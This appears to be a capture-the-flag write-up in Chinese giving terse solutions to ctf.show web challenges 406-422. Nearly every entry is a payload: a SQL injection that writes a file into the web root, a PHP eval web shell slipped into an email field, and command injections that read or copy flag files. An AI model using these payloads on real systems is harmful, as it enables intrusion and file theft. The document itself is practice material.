ctf_show-web入门-其他-（406-422）

406

http://www.baidu.com;'union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23

 

 

 

407

?ip=cafe::add

ip6地址，类的名字叫cafe都是16进制

 

 

 

408

?email="<?php eval($_POST[1]);?>"@123.php

 

 

 

 

409

 

注意这个是可以成功eval的，他把双引号前看做一个php脚本

?email="flageval($_POST[1]);?>"@123.com

 

 

 

 

410

?b=on

 

 

 

411

?b=yes

 

 

 

412

ctfshow=<?php system('cat flag.php')?>

这不是注释符号，直接传即可，注意追加的，错了重开环境

 

 

 

413

ctfshow=*/system('cat flag.php');/*

 

 

 

414

/?ctfshow=-1

 

 

 

415

?k=Getflag

 

 

 

 

416

?f[0]=ctf&f[1]=flag

或者

f=ctf::flag

 

 

 

417

 

?ctf=show

 

 

 

418

拖到最下面还有内容

die=0&clear=;cp flag.php test.txt

变量覆盖

 

 

 

419

code=eval($_GET[1]);

或者

code=echo `tac fl*`;

 

 

 

420

code=nl ../*

 

 

 

421

nl f*

 

 

 

422

nl *